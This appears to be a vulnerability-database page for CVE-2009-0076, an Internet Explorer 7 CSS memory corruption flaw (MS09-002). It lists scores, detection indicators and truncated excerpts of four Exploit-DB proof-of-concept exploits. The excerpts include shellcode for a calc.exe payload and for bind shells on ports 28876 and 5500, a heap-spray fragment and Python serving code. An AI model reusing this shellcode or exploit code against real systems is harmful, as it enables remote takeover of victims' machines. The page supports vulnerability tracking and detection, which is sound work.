CVE-2009-0076
published 2009-02-10CVE-2009-0076: Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote attackers to execute arbitrary code via the zoom style directive in conjunction…
PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
33.54%
98.2th percentile
Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote attackers to execute arbitrary code via the zoom style directive in conjunction with unspecified other directives in a malformed Cascading Style Sheets (CSS) stylesheet in a crafted HTML document, aka "CSS Memory Corruption Vulnerability."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4
bytes↗
%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0
bytes↗
%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304
bytes↗
%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e
bytes↗
%u0c0c%u0c0c
bytes↗
%u0D0D%u0D0D
bytes↗
%u0c0c%u0c0c
bytes↗
%u0C0C%u0C0C
- →Exploit delivers a crafted HTML page containing JavaScript heap spray using NOP sled value 0x0c0c0c0c; detect large repeated allocations of %u0c0c%u0c0c or %u0D0D%u0D0D in JavaScript on IE7 page loads. ↗
- →Exploit is served over HTTP on port 80 by a rogue Python HTTPServer; the server header is set to 'myRequestHandler' which can be used as a network detection indicator. ↗
- →Exploit targets Internet Explorer 7.0.5730.11 on Windows XP SP2 and Windows 2003 SP2; scope detection to those specific UA strings combined with CSS containing the zoom directive. ↗
- →The vulnerability is triggered by the CSS 'zoom' style directive in XHTML strict mode; inspect CSS content in HTTP responses for 'zoom' combined with other directives in malformed stylesheets delivered to IE7 clients. ↗
- →Post-exploitation bind shell listens on TCP/28876; monitor for unexpected inbound connections to this port on Windows XP/2003 hosts after IE7 exploitation. ↗
- →Post-exploitation bind shell listens on TCP/5500 (ShikataGaNai-encoded payload); monitor for unexpected inbound connections to port 5500 on Windows 2003 SP2 hosts after IE7 exploitation. ↗
- →Heap spray block size of 0x40000 (262144 bytes) with repeated 0x0c0c0c0c pattern is characteristic of this exploit; memory forensics or heap inspection can identify this pattern. ↗
- ·Exploit (8152) uses a calc.exe payload (win32_exec) for PoC; real-world attacks would substitute a different shellcode — the heap spray NOP sled and 0x0c0c0c0c return address are the stable detection anchors, not the specific payload bytes. ↗
- ·Exploit (8080) shellcode is encoded with ShikataGaNai; raw byte signatures will not match after re-encoding. Detect via heap spray pattern and bind port rather than static shellcode bytes. ↗
- ·Exploit (8079) shellcode opens a bind shell on port 28876/tcp; the port is hardcoded in the shellcode and may differ in modified variants. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb·2009-03-04
CVE-2009-0076 Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#
# Author : Ahmed Obied ([email protected])
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x
Exploit-DB
Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
---
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031
Exploit-DB
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
---
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.lengthwindow.setTimeout("ok();",800);
# milw0rm.com [2009-02-20]
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportErro
No writeups or analysis indexed.
http://www.us-cert.gov/cas/techalerts/TA09-041A.htmlhttp://www.vupen.com/english/advisories/2009/0389http://www.zerodayinitiative.com/advisories/ZDI-09-012/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6081http://www.us-cert.gov/cas/techalerts/TA09-041A.htmlhttp://www.vupen.com/english/advisories/2009/0389http://www.zerodayinitiative.com/advisories/ZDI-09-012/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6081
2009-02-10
Published